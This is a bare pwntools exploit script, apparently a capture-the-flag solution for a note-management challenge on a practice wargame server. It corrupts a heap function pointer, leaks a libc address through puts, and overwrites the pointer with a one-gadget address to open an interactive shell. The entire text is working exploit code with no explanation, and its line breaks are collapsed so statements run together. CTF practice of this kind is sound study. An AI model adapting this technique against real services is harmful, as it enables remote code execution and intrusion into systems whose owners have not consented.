1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52
| from pwn import * context(log_level = "debug", terminal = ["deepin-terminal", "-x", "sh", "-c"])
t = remote('hackme.inndy.tw', 7713)
t.recvuntil('::> ') t.sendline('c')
def add_n(size, data): t.sendline('a') t.recvuntil('size > ') t.sendline(str(size)) t.recvuntil('data > ') t.sendline(data)
def open_n(id, data): t.recvuntil('::> ') t.sendline('b') t.recvuntil('id > ') t.sendline(str(id)) t.recvuntil('edit (Y/n)') t.sendline('n') t.recvuntil('::> ') t.sendline(data)
def del_n(id): t.sendlineafter('::> ', 'c') t.sendlineafter('id > ', str(id))
plt_puts = 0x8048570 plt_free = 0x8048510 add_n(0x8, p32(plt_free)) add_n(0x40, 'aaaa') add_n(0x30, 'bbbb') open_n(1, chr(93)) del_n(0) add_n(0x8,p32(plt_puts)) open_n(1,chr(93)) libc = ELF('/Users/carlstar/Downloads/libc-2.23.so.i386') libc.address = u32(t.recv(4)) - 48 - 0x1B2780 magic = libc.address + 0x3ac3e del_n(0) add_n(0x8,p32(magic)) open_n(1,chr(93)) t.interactive()
|